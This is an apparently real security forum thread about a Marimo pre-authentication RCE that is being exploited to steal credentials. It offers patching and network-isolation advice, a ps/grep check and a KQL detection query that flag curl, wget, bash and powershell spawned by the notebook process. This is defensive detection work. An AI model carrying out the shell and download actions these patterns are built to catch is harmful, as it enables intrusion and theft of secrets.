Marimo Pre-Auth RCE: Active Exploitation & Credential Theft
Just caught the BleepingComputer report regarding the critical pre-authentication RCE in Marimo (CVE-2025-31115). It looks like threat actors are actively exploiting this to steal credentials, likely targeting exposed instances used for data science workflows.
Since Marimo notebooks execute Python code, an unauthenticated RCE is essentially a game-over for that container/host. The report indicates attackers are using the access to scrape environment variables and cloud keys.
Immediate Action Items:
- Patch immediately: Ensure you are running the latest version.
- Network Segmentation: Do not expose Marimo instances directly to the public internet. Put them behind a VPN or Auth proxy.
If you suspect you might be compromised, check for suspicious parent-child process relationships. The exploit spawns a shell, so look for Python processes spawning /bin/sh or curl.
# Check for unexpected shell processes spawned by the marimo runtime
ps aux --forest | grep -A 5 "marimo" | grep -E "sh|bash|curl|wget|python.*-c"
Also, keep an eye on your egress traffic. If the notebook server is suddenly phoning home to unknown IPs, it's too late.
How is everyone else securing notebook interfaces like Jupyter or Marimo? Are you relying on WAFs, or are you strictly enforcing VPN-only access for data science teams?
We actually found a few instances running in our dev environment during our last asset inventory. We've moved to a 'deny-by-default' egress policy for these containers. If a notebook needs to pull data, it has to go through a specific internal proxy.
Here is a quick Python snippet to check the installed Marimo version if you are managing dependencies via pip:
import pkg_resources
try:
version = pkg_resources.get_distribution("marimo").version
print(f"Installed Marimo version: {version}")
except pkg_resources.DistributionNotFound:
print("Marimo not found in this environment.")
Make sure you verify the patched version against the advisory.
As a pentester, I see these notebook tools exposed way too often. Developers love the convenience, but they often forget that root or a service account inside the container is a massive prize.
From a detection standpoint, if you have EDR on those nodes, look for sys.modules tampering or unexpected imports in the Python interpreter logs. The initial exploit usually involves importing os or subprocess in a way that deviates from the notebook's saved state.
Spotting the exploitation attempts is key since patch cycles might lag in dev environments. Watch for the Marimo process spawning unexpected shells or network tools. This KQL query helps identify those suspicious parent-child relationships:
ProcessCreationEvents
| where ParentProcessName contains "marimo"
| where ProcessName in ("curl", "wget", "bash", "powershell")
Also, verify if your API gateways are dropping specific path traversals if you can't patch immediately.
Verified Access Required
To maintain the integrity of our intelligence feeds, only verified partners and security professionals can post replies.
Request Access